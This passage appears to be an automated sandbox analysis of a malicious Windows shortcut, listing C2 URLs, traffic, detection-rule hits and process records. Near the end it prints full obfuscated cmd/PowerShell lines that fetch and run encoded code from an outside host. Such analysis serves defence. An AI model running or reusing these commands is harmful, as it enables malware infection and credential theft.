      Source: powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EC6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3106887553.000001B41ECFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4628D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
      Source: powershell.exe, 00000007.00000002.3008017548.00000140014FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.00000140014D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D45A7000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4256098800.00007FF780FB1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5F248000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000000.3904011963.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime
      Source: powershell.exe, 00000007.00000002.3008017548.0000014000E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4638C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80839000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E816CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8132C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000002.00000002.3178404159.000001B42EAB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014001650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3040028318.000001401007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3820508680.000002B472857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3820508680.000002B472714000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.00000248814EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000007.00000002.3008017548.0000014001378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41ECFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.00000140005D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C5D37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C4885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com
      Source: powershell.exe, 00000007.00000002.3051426177.000001407502F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/
      Source: svczHost.exe, 00000013.00000002.4247349250.0000015B5E806000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/12
      Source: svczHost.exe, 00000013.00000002.4247349250.0000015B5E806000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/12h
      Source: powershell.exe, 00000002.00000002.3106887553.000001B4200B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d751
      Source: powershell.exe, 00000002.00000002.3106887553.000001B4200B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118007bceee
      Source: powershell.exe, 0000000B.00000002.3383100273.000001F1C48C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C5D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa17
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41F119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118400327ee
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ce0b51c3
      Source: powershell.exe, 00000002.00000002.3106887553.000001B4203D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file
      Source: powershell.exe, 0000000B.00000002.3383100273.000001F1C48C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469ac5d7939c1a666e89b2957d1443edc11d1
      Source: powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/703e90d03436817ef0c550cdab0733b4e7b1e8dce7d6d7e6af8c26ad2c61f0372b
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41F119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/932cebe308ef0a27dd8559a84e000b81c7997ad8503bf075cd2ba01defa0b09f67
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/941a75b2b8dd4d62918624c57bd478b5a12d02b9af905ac945932cb2af1ccd0323
      Source: powershell.exe, 0000000B.00000002.3383100273.000001F1C4521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C472D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6a
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3106887553.000001B41F0C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf86
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file3/118b0ccf6258fcd855ea3e43f821c430215052fb3eb9eca5064994f5c1e3552983
      Source: powershell.exe, 00000002.00000002.3106887553.000001B41EC6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/ij
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49777 version: TLS 1.2

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Reads the Security eventlog
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\myRdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\myRdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\RdpService
      Reads the System eventlog
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\myRdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\myRdpService
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
      Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: gW6FHWNFzR.lnk, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
      Source: amsi64_8756.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: 44.2.myRdpService.exe.7ff6dfe00000.0.unpack, type: UNPACKEDPEMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Source: 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Source: Process Memory Space: powershell.exe PID: 3340, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 8756, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: svczHost.exe PID: 7664, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Source: Process Memory Space: myRdpService.exe PID: 7372, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
      Powershell drops PE file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\fileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BBF1C62_2_00007FFA83BBF1C6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BBFF722_2_00007FFA83BBFF72
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83C832CD2_2_00007FFA83C832CD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFA83BC4E6B7_2_00007FFA83BC4E6B
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFA83C99FD111_2_00007FFA83C99FD1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFA83BC77A623_2_00007FFA83BC77A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFA83BC855223_2_00007FFA83BC8552
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FFA83BD712027_2_00007FFA83BD7120
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FFA83BC0E8545_2_00007FFA83BC0E85
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FFA83BC0E2545_2_00007FFA83BC0E25
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 45_2_00007FFA83BC0F4945_2_00007FFA83BC0F49
      Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\myRdpService.exe 5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
      Source: svczHost.exe.11.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644
      Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644Jump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
      Source: gW6FHWNFzR.lnk, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
      Source: amsi64_8756.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: 44.2.myRdpService.exe.7ff6dfe00000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: Process Memory Space: powershell.exe PID: 3340, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 8756, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: svczHost.exe PID: 7664, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: Process Memory Space: myRdpService.exe PID: 7372, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
      Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@67/55@1/3
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8572:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4604:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7728:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8636:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5340:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8572:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8636:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7728:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1348:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5744:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1348:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5744:304:WilStaging_02
      Source: C:\Windows\Temp\myRdpService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8712:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4604:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:880:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8712:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:304:WilStaging_02
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8476:304:WilStaging_02
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\STARTUAC
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5340:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2900:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8764:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6328:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6328:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8764:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2900:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8476:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51yaqg4h.uo5.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: gW6FHWNFzR.lnkReversingLabs: Detection: 15%
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAEBA.tmp" "c:\Users\user\AppData\Local\Temp\p0kqociu\CSCE1A7387FE7C64A8A9613A1F038E91290.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAH